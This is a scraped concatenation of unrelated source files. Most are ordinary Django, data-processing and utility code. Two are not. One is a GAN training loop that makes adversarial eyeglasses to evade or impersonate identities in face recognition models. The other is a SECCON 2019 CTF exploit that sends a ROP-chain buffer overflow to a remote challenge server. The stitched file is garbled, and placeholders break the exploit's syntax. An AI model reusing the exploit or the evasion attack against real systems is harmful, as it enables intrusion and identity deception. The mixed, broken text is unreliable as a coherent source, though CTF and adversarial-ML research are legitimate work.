generator # # ========================== for p in disc.parameters(): p.requires_grad = False optimizer_g.zero_grad() noise = torch.FloatTensor( batch_size, 25).uniform_(-1.0, 1.0).to(device) z = autograd.Variable(noise.data, requires_grad=True) # discriminative loss fake_images = gen(z) g_loss = adversarial_loss(disc(fake_images), valid) grads_disc_loss = autograd.grad(g_loss, gen.parameters(), retain_graph=True) # attack loss worn_imgs = wear_eyeglasses(fake_images, attacker_img, mask_img) clf_loss, prob, _ = calc_loss( target_model, worn_imgs, target, img_size, mode) grads_clf_loss = autograd.grad(-1.0 * clf_loss, gen.parameters(), retain_graph=False) # update generator parameters gradients for i, p in enumerate(gen.parameters()): grad_1 = grads_disc_loss[i] grad_2 = grads_clf_loss[i] if torch.norm(grad_1, p=2) > torch.norm(grad_2, p=2): grad_1 = grad_1 * torch.norm(grad_2, p=2) / torch.norm(grad_1, p=2) else: grad_2 = grad_2 * torch.norm(grad_1, p=2) / torch.norm(grad_2, p=2) p.grad = (kappa * grad_1 + kappa * grad_2).clone() optimizer_g.step() # ========================== # train discriminator # # ========================== for p in disc.parameters(): p.requires_grad = True optimizer_d.zero_grad() fake_images = autograd.Variable( fake_images.data, requires_grad=True) real_loss = adversarial_loss(disc(batch), valid) fake_loss = adversarial_loss(disc(fake_images), fake) d_loss = (fake_loss + real_loss) / 2.0 d_loss.backward() optimizer_d.step() if idx % 50 == 0: print("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [Prob: %f] [Disc: %f]" % (epoch, epochs, idx, len(loader), d_loss.item(), prob.item(), g_loss.item())) batches_done = epoch * len(loader) + idx if batches_done % sample_interval == 0: save_image(worn_imgs.data[:25], "logs/%d.png" % batches_done, nrow=5, normalize=False) torch.save(gen.state_dict(), r'{}\gen_{}.pt'.format(save_path, epochs)) torch.save(disc.state_dict(), r'{}\disc_{}.pt'.format(save_path, epochs)) def parse(argv): parser = argparse.ArgumentParser('Digital attack by using accessarios.') parser.add_argument('--batch_size', type=int, default=32, help='input batch size for training (default: 32)') parser.add_argument('--epochs', type=int, default=1, help='number of epochs to train (default: 1)') parser.add_argument('--lr', type=float, default=5e-5, help='learning rate (default: 5e-5)') parser.add_argument('--no_cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--interval', type=int, default=50, help='how many batches to wait before printing') parser.add_argument('--mode', type=str, default='dodge', help='mode (dodge or impersonate) of attacking face recognition system (default: dodge)') parser.add_argument('--target', type=int, default=0, help='face-id of choosen victim (default: 0)') parser.add_argument('--target_model', type=str, default='FaceNet', help='attacked face recognition model (FaceNet, CosFace, ArcFace, default: FaceNet)') # dataset setting parser.add_argument('--eyeglasses', type=str, default=r'data\eyeglasses', help='training eyeglasses dataset') parser.add_argument( '--mask', type=str, default=r'data\eyeglasses_mask_6percent.png', help='path of eyeglasses mask') parser.add_argument('--attacker', type=str, default=r'data\digital\19.jpg', help='the picture of attacker') # params seeting parser.add_argument('--kappa', type=float, default=0.25, help='weight of generator\'s loss function') # pretrained model parser.add_argument('--pretrained_epochs', type=int, default=200, help='number of epochs of trained model') parser.add_argument('--save_path', type=str, default='save', help='path to save trained model') return parser.parse_args(argv) if __name__ == "__main__": args = parse(sys.argv[1:]) main(args)
8,697
product/migrations/0012_auto_20180827_1748.py
Nosaiba1/Avocado-Ecommerce
0
2170377
# -*- coding: utf-8 -*- # Generated by Django 1.11 on 2018-08-27 17:48 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('product', '0011_auto_20180808_1509'), ] operations = [ migrations.RemoveField( model_name='favorite', name='product', ), migrations.RemoveField( model_name='product', name='is_favourite_value', ), migrations.DeleteModel( name='Favorite', ), ]
582
Gathered CTF writeups/ptr-yudai-writeups/2019/SECCON_CTF_2019_Quals/lazy/listing.py
mihaid-b/CyberSakura
1
2169256
from ptrlib import * elf = ELF("./lazy") #sock = Process("./lazy") sock = Socket("lazy.chal.seccon.jp", 33333) def login_user(username): sock.sendlineafter("Exit\n", "2") sock.sendlineafter(": ", username) sock.recvuntil(", ") sock.recvline() output = sock.recvline() return output def login_pass(password): sock.sendlineafter(": ", password) return rop_pop_rdi = 0x004015f3 rop_pop_rsi_r15 = 0x004015f1 rop_popper = 0x4015e6 rop_csu_init = 0x4015d0 # leak flag username = b'A' * (0x5f + 0x58) login_user(username) password = b'<PASSWORD>' password += b'A' * (0x20 - len(password)) password += b'_<PASSWORD>' password += b'A' * (0x40 - len(password)) password += b'<PASSWORD>' password += b'A' * (0x60 - len(password)) password += b'_<PASSWORD>' password += b'A' * (0x80 - len(password)) password += p64(0xdeadbeef) password += p64(rop_popper) password += p64(0) password += p64(0) password += p64(1) password += p64(elf.got("read")) password += p64(0x40) password += p64(elf.section('.bss') + 0x200) password += p64(0) password += p64(rop_csu_init) password += p64(0) * 2 password += p64(elf.section('.bss') + 0x800) password += p64(0) * 4 password += <PASSWORD>(<PASSWORD>) password += p64(elf.section('.bss') + 0x200) password += <PASSWORD>(<PASSWORD>) login_pass(password) sock.send("/home/lazy/") for i in range(10): print(sock.recvline()) sock.interactive()
1,407
pythonforandroid/recipes/libogg/__init__.py
lstwzd/python-for-android
4
2170359
from pythonforandroid.recipe import NDKRecipe from pythonforandroid.toolchain import current_directory, shprint from os.path import join import sh class OggRecipe(NDKRecipe): version = '1.3.3' url = 'http://downloads.xiph.org/releases/ogg/libogg-{version}.tar.gz' generated_libraries = ['libogg.so'] def build_arch(self, arch): with current_directory(self.get_build_dir(arch.arch)): env = self.get_recipe_env(arch) flags = [ '--with-sysroot=' + self.ctx.ndk_platform, '--host=' + arch.toolchain_prefix, ] configure = sh.Command('./configure') shprint(configure, *flags, _env=env) shprint(sh.make, _env=env) self.install_libs(arch, join('src', '.libs', 'libogg.so')) recipe = OggRecipe()
833
teamcat_service/docker_build/target/one_step_build/teamcat/doraemon/home/viewmodels/vm_webapps.py
zhangyin2088/Teamcat
6
2169156
#coding=utf-8 ''' Created on 2015-11-27 @author: zhangtiande ''' class VM_Webapps(object): ''' classdocs ''' def __init__(self,webapp,login_user): ''' Constructor ''' self.user=login_user self.webapp=webapp def is_public(self): result=False if self.webapp.app_visable_level==1: result=True return result
417
rxmarbles/generator.py
enbandari/rx-marbles
0
2170682
from __future__ import print_function from pyparsing import * from .svgshapes import * import sys import argparse import math import importlib import html import hashlib start_character = "+" nop_event_character = '-' completion_symbol = "|" error_character = "#" infinity_character = ">" colon = Suppress(":") comment_start = "//" nop_event = Word(nop_event_character, exact=1) # our marble can be either single alphanumeric character, or multiple characters surrounded by () marble_text = alphanums start_symbol = Suppress(start_character) simple_marble = Word(marble_text, exact=1) bracked_marble = Suppress("(") + Word(alphanums + "'\"._-") + Suppress(")") groupped_marble = Combine("{" + Word(marble_text + ",") + "}") marble = Or([simple_marble, bracked_marble , groupped_marble]) end = Or([completion_symbol, error_character, infinity_character]).setResultsName('end') timeline_name = Or([QuotedString(quoteChar='"'), Word(alphanums + ",./<>?;'\"[]\{}|`~!@#$%^&*()-=_+")]).setResultsName('name') source_keyword = "source" operator_keyword = "operator" event = Or([nop_event, marble]) events = Group(ZeroOrMore(event)).setResultsName('events') padding = Optional(Word('.')).setResultsName('padding') events_sequence = Group(padding + start_symbol + events + end).setResultsName('events_sequence', True) skewed_group = Suppress("{") + OneOrMore(events_sequence) + Suppress("}") type = Or([source_keyword, operator_keyword]).setResultsName('type') source_or_operator = Group(type + timeline_name + colon + Or([events_sequence, skewed_group])) marble_diagram_keyword = "marble" marble_diagram_body = OneOrMore(source_or_operator) marble_diagram_name = Word(alphanums + "_").setResultsName("diagram_name") marble_diagram = Group(Suppress(marble_diagram_keyword) + marble_diagram_name + Suppress("{") + marble_diagram_body + Suppress("}")) marble_diagrams = OneOrMore(marble_diagram) marble_diagrams.ignore(comment_start + restOfLine) def create_id_string(name): return hashlib.md5(name.encode("utf-8")).hexdigest() class Timeline: def __init__(self, parsed_list, theme): self.theme = theme self.type = parsed_list.type self.name = parsed_list.name self.timelines = parsed_list.events_sequence self.rotation_deg = 0 if len(self.timelines) > 1: self.rotation_deg = 15 max_index = max(map(lambda x: 2 + len(x.events) + len(x.padding), self.timelines)) # this is used as distance on flat axis between two time events self.base_thick_width = 50.0 # this is used as distance on skewed between two time events self.tick_width = self.base_thick_width / math.cos(self.rotation_deg * math.pi / 180.0) self.width = self.tick_width * max_index self.top_margin = 30 self.total_height = 0 def create_groupped_symbol(self, o, x_offset, coloring): # Sub-parsing groupped marble ungroupped_marble = Suppress("{") + Word(marble_text) + ZeroOrMore(Suppress(",") + Word(marble_text)) + Suppress("}") subitems = ungroupped_marble.parseString(o) step_width = 1.0 * self.base_thick_width body = ", ".join(map(lambda x: str(x), subitems)) width = step_width * len(subitems) groupped_symbol = Struct(self.theme, x_offset, body, coloring, width, subitems, step_width) return groupped_symbol def __get_timeline_shapes(self, coloring, timeline_items): # adding events theme = self.theme self.end = timeline_items.end x_offset = 0 global parseString for o in timeline_items.events: if o.startswith('{') and o.endswith('}'): groupped_symbol = self.create_groupped_symbol(o, x_offset, coloring) self.symbols.append(groupped_symbol) elif o != nop_event_character: self.symbols.append(Marble(theme, x_offset, 0, o, coloring)) x_offset += self.tick_width # adding completion, error or infinity_character symbol to the axis if self.end == completion_symbol: self.symbols.append(Terminate(theme, x_offset)) elif self.end == error_character: self.symbols.append(Error(theme, x_offset)) # adding time axis self.symbols.insert(0, Axis(theme, 0, x_offset + 2 * self.base_thick_width)) def get_svg(self, y, coloring, max_length): svg = "" yy = y + self.top_margin for timeline_items in self.timelines: self.symbols = [] self.__get_timeline_shapes(coloring, timeline_items) x_offset = self.base_thick_width * len(timeline_items.padding) g_id = self.type + "_" + create_id_string(self.name) rot_yy = yy svg += '<g id="%s" transform="rotate(%s %s %s) translate(%s,%s)">' % (g_id, self.rotation_deg, x_offset, rot_yy , x_offset, yy) for obj in self.symbols: svg += obj.get_shape() h = obj.get_height() if self.total_height < h + self.top_margin : self.total_height = h + self.top_margin svg += '</g>' # and finally - inserting an extra axis - only when we are in the skewed block mode if len(self.timelines) > 1: max_padding = max(map(lambda x: len(x.padding), self.timelines)) a = Axis(self.theme, 0, self.base_thick_width * (4 + max_padding)) axisSvg = '<g id="skew" transform="translate(0 %s)">%s</g>' % (yy, a.get_shape()) svg = axisSvg + svg return svg def height(self): "returns height in pixels. This must be called after get_svg()" # let's calculate all bounding boxes max_height = 0 for events_sequence in self.timelines: timeline_width = self.base_thick_width * (1 + len(events_sequence.events)) timeline_height = self.total_height bb = (timeline_width, timeline_height) # width of the diagonal diag = math.sqrt(bb[0] * bb[0] + bb[1] * bb[1]) alpha_rad = math.atan2(bb[1], bb[0]) alpha_deg = alpha_rad * 180.0 / math.pi # after rotation beta_deg = alpha_deg + self.rotation_deg beta_rad = beta_deg * math.pi / 180.0 height = diag * math.sin(beta_rad) if max_height < height: max_height = height return max_height class Source(Timeline): def __init__(self, parsed_list, theme): Timeline.__init__(self, parsed_list, theme) class Operator: def __init__(self, parsed_list, theme): self.theme = theme self.timeline = Timeline(parsed_list, theme) self.name = parsed_list.name self.width = self.timeline.width self.box_height = 80 self.top_margin = 10 def height(self): "height in pixels" return self.box_height + self.timeline.height() + 2 * self.top_margin def get_svg(self, y, coloring, max_length): theme = self.theme box_y = y + self.top_margin box = OperatorBox(theme, max_length, self.box_height, html.escape(self.name)) svg = '<g transform="translate(0 %s)">' % box_y svg += box.get_shape() + self.timeline.get_svg(0 + self.box_height + self.top_margin, coloring, max_length) svg += '</g>' return svg # --------------------------------------------------- # events_sequence elements # --------------------------------------------------- def get_objects(parse_result, theme): global source_keyword global operator_keyword result = [] for line in parse_result: type = line[0] if type == operator_keyword: t = Operator(line, theme) elif type == source_keyword: t = Source(line, theme) else: raise Exception("unsupported type") result.append(t) return result # other colouring schemes can be added here palettes = {'default': ["#ffcc00", "#48b3cd", "#ffaacc", "#e5ff7c", "#ececec", "#a4ecff", "#ff6600", "#a0c800", "#ff3a3a", "#afafe9", "#db7c7c", "#80ffe6"]} class Coloring: 'This object is stateful color provider for each of the marble' def __init__(self, paletteName='default'): global palettes self.color_palette = palettes[paletteName] self.colormap = {} self.index = 0 def get_color_for(self, marbleId): if not marbleId in self.colormap: self.colormap[marbleId] = self.color_palette[self.index] self.index += 1 if self.index >= len(self.color_palette): self.index = 0 return self.colormap[marbleId] class SvgDocument: def __init__(self, row_objects, theme, scale): self.theme = theme self.scale = scale self.coloring = Coloring() self.row_objects = row_objects # in pixels self.max_row_width = max(map(lambda row: row.width, self.row_objects)) def get_document(self): theme = self.theme scale = self.scale body = "" y = 0 for row in self.row_objects: body += row.get_svg(y, self.coloring, self.max_row_width) y = y + row.height() r = Root(theme, body, self.max_row_width, y, scale / 100.0) return r.node
9,411
BACKEND-DJANGO/ratings/urls.py
CheboiDerrick/web-score
0
2170280
"""ratings URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path, include from django.conf import settings from rest_framework.routers import DefaultRouter from posts.views import ProjectViewSet, ProfileViewSet from django.conf.urls.static import static router = DefaultRouter() router.register(r'api/v1/profile', ProfileViewSet, basename='Profile') router.register(r'api/v1/projects', ProjectViewSet, basename='Project') urlpatterns = [ path('admin/', admin.site.urls), path('api/v1/', include('auth.urls')), path('', include(router.urls)), ] if settings.DEBUG: urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
1,315
ABC/abc101-abc150/abc118/b.py
KATO-Hiro/AtCoder
2
2168234
# -*- coding: utf-8 -*- def main(): n, m = map(int, input().split()) ans = [0 for _ in range(30)] for i in range(n): ka = list(map(int, input().split())) for j in ka[1:]: ans[j - 1] += 1 result = 0 for a in ans: if a == n: result += 1 print(result) if __name__ == '__main__': main()
392
game/migrations/0010_auto_20200828_1951.py
atadams/bbstuff
0
2170822
# Generated by Django 3.1 on 2020-08-29 00:51 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('game', '0009_auto_20200825_1117'), ] operations = [ migrations.AddField( model_name='team', name='primary_color_hex', field=models.CharField(blank=True, max_length=10), ), migrations.AddField( model_name='team', name='secondary_color_hex', field=models.CharField(blank=True, max_length=10), ), migrations.AddField( model_name='team', name='tertiary_color_hex', field=models.CharField(blank=True, max_length=10), ), ]
747
vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/module/loaddata.py
lougxing/gbox
0
2170691
# Tag Highlighter: # Author: <NAME> <abudden _at_ gmail _dot_ com> # Copyright: Copyright (C) 2009-2013 <NAME> # Permission is hereby granted to use and distribute this code, # with or without modifications, provided that this copyright # notice is copied with it. Like anything else that's free, # the TagHighlight plugin is provided *as is* and comes with no # warranty of any kind, either expressed or implied. By using # this plugin, you agree that in no event will the copyright # holder be liable for any damages resulting from the use # of this software. # --------------------------------------------------------------------- from __future__ import print_function import os import glob import re try: from .debug import Debug except ValueError: def Debug(text, level): print(text) data_directory = None leadingTabRE = re.compile(r'^\t*') includeRE = re.compile(r'^%INCLUDE (?P<filename>.*)$') envRE = re.compile(r'\$\{(?P<envname>[A-Za-z0-9_]+)\}') def SetLoadDataDirectory(directory): global data_directory data_directory = directory def EntrySplit(entry, pattern): result = [] parts = entry.strip().split(pattern, 1) if len(parts) == 1: result = parts elif ',' in parts[1]: result = [parts[0], parts[1].split(',')] else: result = parts return result def ParseEntries(entries, indent_level=0): index = 0 while index < len(entries): line = entries[index].rstrip() m = leadingTabRE.match(line) this_indent_level = len(m.group(0)) unindented = line[this_indent_level:] if len(line.strip()) == 0: # Empty line pass elif line.lstrip()[0] == '#': # Comment pass elif this_indent_level < indent_level: return {'Index': index, 'Result': result} elif this_indent_level == indent_level: if ':' in unindented: parts = EntrySplit(unindented, ':') key = parts[0] try: result except NameError: result = {} if not isinstance(result, dict): raise TypeError("Dictionary/List mismatch in '%s'" % key) if len(parts) > 1: result[key] = parts[1] else: try: result except NameError: result = [] if not isinstance(result, list): raise TypeError("Dictionary/List mismatch: %r" % result) result += [unindented] else: sublist = entries[index:] subindent = indent_level+1 parsed = ParseEntries(sublist, subindent) try: result except NameError: result = {} if key in result and isinstance(result[key], dict) and isinstance(parsed['Result'], dict): result[key] = dict(result[key].items() + parsed['Result'].items()) else: result[key] = parsed['Result'] index += parsed['Index'] - 1 index += 1 try: result except NameError: result = {} return {'Index': index, 'Result': result} def LoadFile(filename): fh = open(filename, 'r') entries = fh.readlines() index = 0 while index < len(entries): m = includeRE.match(entries[index]) if m is not None: # Include line inc_file = m.group('filename').strip() e = envRE.search(inc_file) try: while e is not None: inc_file = inc_file[:e.start()] + \ os.environ[e.group('envname')] + \ inc_file[e.end():] e = envRE.search(inc_file) except KeyError: raise pass if os.path.exists(inc_file): fhinc = open(inc_file, 'r') extra_entries = fhinc.readlines() fhinc.close() entries = entries[:index] + extra_entries + entries[index+1:] else: Debug("No such file: '%s'" % inc_file, "Warning") index += 1 fh.close() return ParseEntries(entries)['Result'] def LoadDataFile(relative): filename = os.path.join(data_directory,relative) return LoadFile(filename) def GlobData(matcher): files = glob.glob(os.path.join(data_directory, matcher)) return [os.path.relpath(i,data_directory) for i in files] if __name__ == "__main__": import pprint pprint.pprint(LoadFile('testfile.txt'))
4,796
Web/demos/read_frames_fast.py
parvatijay2901/FaceNet_FR
6
2168950
# Modified from: # https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/ # Performance: # Python 2.7: 105.78 --> 131.75 # Python 3.7: 15.36 --> 50.13 # USAGE # python read_frames_fast.py --video videos/jurassic_park_intro.mp4 # import the necessary packages from imutils.video import FileVideoStream from imutils.video import FPS import numpy as np import argparse import imutils import time import cv2 def filterFrame(frame): frame = imutils.resize(frame, width=450) frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) frame = np.dstack([frame, frame, frame]) return frame # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-v", "--video", required=True, help="path to input video file") args = vars(ap.parse_args()) # start the file video stream thread and allow the buffer to # start to fill print("[INFO] starting video file thread...") fvs = FileVideoStream(args["video"], transform=filterFrame).start() time.sleep(1.0) # start the FPS timer fps = FPS().start() # loop over frames from the video file stream while fvs.running(): # grab the frame from the threaded video file stream, resize # it, and convert it to grayscale (while still retaining 3 # channels) frame = fvs.read() # Relocated filtering into producer thread with transform=filterFrame # Python 2.7: FPS 92.11 -> 131.36 # Python 3.7: FPS 41.44 -> 50.11 #frame = filterFrame(frame) # display the size of the queue on the frame cv2.putText(frame, "Queue Size: {}".format(fvs.Q.qsize()), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2) # show the frame and update the FPS counter cv2.imshow("Frame", frame) cv2.waitKey(1) if fvs.Q.qsize() < 2: # If we are low on frames, give time to producer time.sleep(0.001) # Ensures producer runs now, so 2 is sufficient fps.update() # stop the timer and display FPS information fps.stop() print("[INFO] elasped time: {:.2f}".format(fps.elapsed())) print("[INFO] approx. FPS: {:.2f}".format(fps.fps())) # do a bit of cleanup cv2.destroyAllWindows() fvs.stop()
2,190
ejercicios/ej_26_groupDataFrames.py
jorgemauricio/python
0
2169310
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jul 17 16:17:25 2017 @author: jorgemauricio """ # librerias import numpy as np import pandas as pd from pandas import DataFrame, Series # crear un dataframe dframe = DataFrame({'k1':['X','X','Y','Y','Z'], 'k2':['alpha','beta','alpha','beta','alpha'], 'dataset1':np.random.randn(5), 'dataset2':np.random.randn(5)}) # desplegar dframe # tomamos la columan dataset1 y lo agrupamos con la llave k1 group1 = dframe['dataset1'].groupby(dframe['k1']) # desplegar el objecto group1 # ahora podemos realizar operaciones en este objeto group1.mean() # podemos utilizar los nombres de las columnas para generar las llaves de los grupos dframe.groupby('k1').mean() # o multiples columnas dframe.groupby(['k1','k2']).mean() # podemos saber el tamaño del grupo con el metodo .size() dframe.groupby(['k1']).size() # podemos iterar entre los grupos # por ejemplo: for name,group in dframe.groupby('k1'): print ("This is the %s group" %name) print (group) print ('\n') # utilizando multiples llaves for (k1,k2) , group in dframe.groupby(['k1','k2']): print ("Key1 = %s Key2 = %s" %(k1,k2)) print (group) print ('\n') # se puede generar un diccionario de la informacion group_dict = dict(list(dframe.groupby('k1'))) # desplegar el grupo con una 'X' group_dict['X']
1,411
csv2yaml/__main__.py
sepandhaghighi/csv2yaml
12
2169741
# -*- coding: utf-8 -*- from .csv2yaml import * import time import sys import doctest import os def run(filename,header=None,error_pass=False): first_time = time.perf_counter() print("Converting ... ") json_size=json_convert(filename,header=header,error_pass=error_pass) if json_size!=None: pickle_size=json_to_pickle(filename,error_pass=error_pass) yaml_size=json_to_yaml(filename,error_pass=error_pass) print(json_size) print(pickle_size) print(yaml_size) second_time = time.perf_counter() elapsed_time = second_time - first_time elapsed_time_format = time_convert(str(elapsed_time)) print("Converted In " + elapsed_time_format) print("Where --> " + Source_dir) line() if __name__=="__main__": args=sys.argv if len(args)>1: if args[1].upper()=="TEST": doctest.testfile("test.py",verbose=True) elif args[1].upper()=="ALL": file_header=None if len(args)>2: file_header=args[2] for file in os.listdir(): if file.find(".csv")!=-1: run(filename=file,header=file_header,error_pass=True) elif args[1].upper()=="HELP": help_func() elif len(args)>2: run(args[1],header=args[2]) else: run(args[1]) else: help_func() sys.exit()
1,403
research_app/ContentSchema.py
APrioriInvestments/research_frontend
0
2170366
# Copyright 2019 APriori Investments # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Content-management schema for the research frontend. """ import time from typed_python import OneOf from object_database import Schema, Indexed, current_transaction schema = Schema("research_app.ContentSchema") @schema.define class ModuleContents: # gives the prior script in edit-time - if we navigate to an old script and edit it, # that older script will be the parent. parent = OneOf(None, schema.ModuleContents) timestamp = float # actual contents of the script contents = str @schema.define class Project: name = Indexed(str) created_timestamp = float last_modified_timestamp = float def deleteSelf(self): self.delete() @schema.define class Module: name = Indexed(str) project = Indexed(schema.Project) current_buffer = str prior_contents = OneOf(None, ModuleContents) last_modified_timestamp = float created_timestamp = float def update(self, buffer): """the user updated the text in the background, but hasn't tried to execute it yet.""" self.current_buffer = buffer def mark(self): """Snapshot this version of the module.""" self.prior_contents = ModuleContents( parent=self.prior_contents, contents=self.current_buffer, timestamp=time.time() ) def deleteSelf(self): self.delete()
1,980
app/chatterbot_custom/covid_adapter.py
phu-bui/chatbot_covid19
3
2169884
from chatterbot.logic import LogicAdapter from chatterbot.conversation import Statement import logging from app.services.stats_service import getUsStats, getUkStats from app.services.news_service import getNews import random logging.basicConfig(level=logging.INFO) class CustomLogicAdapter(LogicAdapter): def can_process(self, statement): input_words = ['uk', 'us', 'covid','stats','uk confirmed','uk deaths','uk recovered','uk critical', 'us confirmed','us deaths','us recovered','us critical','all','good news', 'good covid news', 'tell me someting good','coronavirus positive news','covid positive news', 'Hi', 'Howdy', 'Hello','until next time', 'bye','ciao', 'adios','its been real' ] if any(x.lower() for x in input_words): return True else: return False def process(self, input_statement, additional_response_selection_parameters): user_input = input_statement.text.lower() uk_response = getUkStats() us_response = getUsStats() news_response = getNews() if 'uk confirmed' in user_input: confirmed = uk_response[0].get("confirmed", "") response_statement = Statement(text='Confirmed Uk Cases {}'.format(confirmed)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'uk deaths' in user_input: deaths = uk_response[0].get("deaths", "") response_statement = Statement(text='Confirmed Uk Deaths {}'.format(deaths)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'uk recovered' in user_input: recovered = uk_response[0].get("recovered", "") response_statement = Statement(text='Recovered Uk Cases {}'.format(recovered)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'uk critical' in user_input: critical = uk_response[0].get("critical", "") response_statement = Statement(text='Critical Uk Cases {}'.format(critical)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'us confirmed' in user_input: confirmed = us_response[0].get("confirmed", "") response_statement = Statement(text='Confirmed Us Cases {}'.format(confirmed)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'us deaths' in user_input: deaths = us_response[0].get("deaths", "") response_statement = Statement(text='Confirmed Us Deaths {}'.format(deaths)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'us recovered' in user_input: recovered = us_response[0].get("recovered", "") response_statement = Statement(text='Recovered Us Cases {}'.format(recovered)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'us critical' in user_input: critical = us_response[0].get("critical", "") response_statement = Statement(text='Critical Us Cases {}'.format(critical)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'all' and 'us' in user_input: response_statement = Statement(text='United States Stats: {}'.format( '\nconfirmed: ' + str(us_response[0].get("confirmed", "")) + '\nrecovered: ' + str(us_response[0].get("recovered", "")) + '\ncritical: '+ str(us_response[0].get("critical", "")) + '\ndeaths: '+ str(us_response[0].get("deaths", "")) )) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'all' and 'uk' in user_input: response_statement = Statement(text='United Kingdom Stats: {}'.format( '\nconfirmed: ' + str(uk_response[0].get("confirmed", "")) + '\nrecovered: ' + str(uk_response[0].get("recovered", "")) + '\ncritical: '+ str(uk_response[0].get("critical", "")) + '\ndeaths: '+ str(uk_response[0].get("deaths", "")) )) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'news' or 'positive' or 'happy' or 'good' in user_input: response_statement = Statement(news_response) response_statement.confidence = .8 logging.info(response_statement) return response_statement elif 'hi' or 'howdy' or 'hello' in user_input: #add help response responses = ["""Hello \U0001F31F""", "Hi there!"] response_statement = Statement(random.choice(responses)) response_statement.confidence = 1 logging.info(response_statement) return response_statement elif 'bye' or 'ciao' or 'adios' or 'its been real' in user_input: #add help response responses = ["""Bye \U0001F31F""", "Chat later!", "Have a good one"] response_statement = Statement(random.choice(responses)) response_statement.confidence = 1 logging.info(response_statement) return response_statement else: response_statement = Statement(text="I'm sorry I could not understand") response_statement.confidence = 0 return response_statement
6,124
anagram.py
Rahulnigam28/Anagram
2
2169343
#~/usr/bin/python # function to input strings and check if they are anagram def is_anagram (s1, s2): if s1 == s2: return False elif len(s1) == len(s2): x = list(s1) y = list(s2) for i in range(0 , len (x)): for j in range (0 , len (y)): if x[i] == y[j]: del y[j] break if len(y) == 0: return True else: return False else: return False t = int(input("Enter number of files to read\n")) filename = [] r = [] for files in range(0, t): # function to read file and put the words in list filename.append(raw_input("Enter name of the file:\r\t\t\t")) r.append( open(filename[files] ,"r").read().split()) # main function for files in range(0 , t): x = r[files] anagram = {} for i in range(0, len(x)): for j in range(1, len (x)): if x[i] != "" or x[j] != "": result = is_anagram(x[i],x[j]) if result == True: del x[j] x.insert(j,"") val = len(x[i]) key = x[i] anagram[key] = val print("\n \t\t\t %s" %filename[files]) print("Total Number of Words : %d " %len(x)) print ("Numer of Unique Anagrams : %d " %len(anagram)) print("Length of the Longest Anagram: %s \n" %max(anagram.values()))
2,205
pil_image_analysis_funcs/pilget_exif_data.py
SecTraversl/Toolbox_Python_3.8
0
2170874
# %% ####################################### def pilget_exif_data(image_file: str): from PIL import Image from PIL.ExifTags import TAGS theimage = Image.open(image_file) dict_exif_data = theimage.getexif() for name,data in dict_exif_data.items(): tagname = TAGS.get(name, "unknown-tag") print(f"TAG:{name} ({tagname}) is assigned {data}")
381
src/controllers/route_controllers_system.py
Ron-Chang/spending_tracker_old
0
2169978
from flask import request, jsonify, url_for, redirect from common.models import User, AdminUser @app.route('/member_register', methods=['POST']) def member_register(): """ 註冊 會員 """ request_data = request.get_json() email = request_data.get('email') username = request_data.get('username') non_hash_password = request_data.get('password') hash_password = Encrypt.encrypt_password(non_hash_password) source = OAuthType.OUR user = User(email=email, username=username, password=hash_password, source=source) db.session.add(user) db.session.commit() response_data = {'email': email, 'username': username, 'source': source} return jsonify(response_data) @app.route('/member_login', methods=['POST']) def member_login(): """ 登錄 會員 """ request_data = request.get_json() email = request_data.get('email') password = request_data.get('password') user = User.query.filter_by(email=email).first() if not user: raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD) if not Encrypt.check_password(user.password, password): raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD) token = Login(user=user, email=email).get_token() response_data = {'email': user.email, 'username': user.username, 'token': token, 'source': user.source} return jsonify(response_data) @app.route('/admin_login', methods=['POST']) def admin_login(): """ 登錄 管理員 """ request_data = request.get_json() username = request_data.get('username') password = request_data.get('password') user = AdminUser.query.filter_by(username=username).first() if not user: raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD) if not Encrypt.check_password(user.password, password): raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD) token = AdminLogin(user=user, username=username).get_token() response_data = {'email': user.email, 'username': user.username, 'token': token} return jsonify(response_data)
2,203
old/ipr2tsv.py
orionzhou/biolib
3
2166583
